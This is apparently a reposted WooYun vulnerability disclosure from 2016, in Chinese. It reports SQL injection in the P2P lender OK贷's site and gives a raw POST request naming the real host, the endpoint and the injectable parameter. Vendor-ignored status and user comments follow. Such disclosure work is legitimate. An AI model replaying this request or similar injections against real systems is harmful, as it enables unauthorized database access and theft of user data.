P2P金融安全之OK贷某站SQL注入

admin

139527
文章

114
评论

2017年4月17日01:40:30评论368 views字数 224阅读0分44秒阅读模式

摘要

2016-04-05：细节已通知厂商并且等待厂商处理中
2016-04-05：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-10：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2016-192384

漏洞标题： P2P金融安全之OK贷某站SQL注入

漏洞作者：路人甲

提交时间： 2016-04-05 16:44

公开时间： 2016-04-10 16:50

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： asp+sqlserver注射

1人收藏

漏洞详情

披露状态：

简要描述：

注入

详细说明：

data：

code 区域

POST /website/abouts/deleteaboutsremove HTTP/1.1
 Host: mail.okdai.com:8888
 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459747287; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459747509
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 11
 
 param[0]=-1

注入参数 param[0]

15个数据库

用户

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-10 16:50

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

2016-04-10 17:17 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白，外墙涂料，外墙保温，...)

1

mssql2012 你也猜不出数据库，表，列，数据吧

1# 回复此人
2016-04-10 21:05 | Explo1t ( 路人 | Rank:16 漏洞数:8 | 流生若川，不要小看人生啊！)

1

6666

2# 回复此人
2016-04-11 06:49 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业！)

1

绝B，默默的修复了漏洞。

3# 回复此人
2016-04-11 08:08 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白，外墙涂料，外墙保温，...)

1

@Freebug 经常事儿哈哈哈

4# 回复此人
2016-04-11 08:15 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业！)

1

@老实先生真是够了。。。

5# 回复此人

漏洞概要 关注数(6) 关注此漏洞